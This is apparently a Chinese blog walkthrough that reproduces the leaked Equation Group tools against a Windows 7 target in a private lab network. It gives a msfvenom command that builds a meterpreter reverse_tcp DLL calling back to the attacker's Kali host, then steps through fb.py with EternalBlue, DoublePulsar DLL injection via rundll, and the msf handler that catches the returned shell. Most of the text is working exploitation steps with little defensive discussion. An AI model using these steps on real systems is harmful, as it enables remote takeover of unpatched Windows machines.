攻击机:                                                                      靶机:

Windows7 含方程式攻击脚本                                         Windows7

Ip:192.168..148.133                                                       ip:192.168.148.134

Kali msf

Ip:192.168.148.128

方程式复现

准备工作需要用msf生成一个dll用于后期shell的反弹

Msfvenom –p windows/x64/meterpreter/reverse_tcp      LHOST=192.168.148.128 LPORT=11111-f dll > ~/桌面/hack.dll

其中LHOST是shell连接的ip地址,也就是kali的地址 端口11111连接kali的11111端口

我们把生成的dll放到win7攻击机中,放在C盘根目录

方程式复现

进入win7攻击机,运行fb.py

方程式复现

然后设置攻击目标的ip:192.168.148.134                 我们攻击机本身的ip:192.168.148.133

方程式复现

这里注意一下,这个重定向一定要选no,要不然用msf反弹的shell是攻击机win7的shell就不是靶机的shell了

方程式复现

然后一路过就可以,然后使用Eternalblue这个攻击模块

use Eternalblue

方程式复现

一路回车就可以,可以看到我们攻击的点,注意,这两个模式均选择1

方程式复现

因测试靶机而异了

方程式复现

然后一路回车,Eternalblue模块攻击成功

接下来使用Doublepulsar模块攻击(在Eternalblue模块攻击成功的前提),这个模块可以理解为上传一个木马,我们把我们准备阶段的dll放上去

与此同时,我们要在我们kali攻击机开启msf,来监听反弹的shell,一旦Doublepulsar这个模块攻击成功,我们的msf就会收到来自靶机的shell

手动分割线,进入kali

===========================================================================

我们开启msf

在msf中用handler这个模块

方程式复现

我们设置一下

LHOST 192.168.148.128  shell反弹的地址

LPORT 11111 连接的端口

这个与我们刚开始生成那个dll设置的选项得一致

最后设置一下payload,这个payload与生成dll的payload一致

方程式复现

方程式复现

然后exploit进行攻击,等着shell回连

方程式复现

===========================================================================

然后我们回到攻击机win7中,使用Doublepulsar模块攻击

方程式复现

可看到我们之前设置的选项,这里注意下,选择红色箭头标的

方程式复现

3389端口利用无法复现,可能放出来的这个exp有问题吧

方程式复现

这里我们选rundll,把msf生成的dll绑到用户的进程当中,并填写我们传的dll的路径,我把它放在c盘根目录了 c:\\hack.dll

下面一路回车就行

方程式复现

看到攻击成功,我们去kali看看shell连上了吗

方程式复现

可以看到shell连接成功,那我们就留下点我们的痕迹吧

方程式复现











相关文章:

  • 2022-01-19
  • 2021-11-20
  • 2022-12-23
  • 2021-07-22
  • 2021-12-30
  • 2021-12-02
  • 2021-12-15
  • 2021-09-11
猜你喜欢
  • 2021-10-24
  • 2021-12-21
  • 2022-12-23
  • 2021-07-26
  • 2021-09-01
  • 2022-12-23
  • 2022-01-20
相关资源
相似解决方案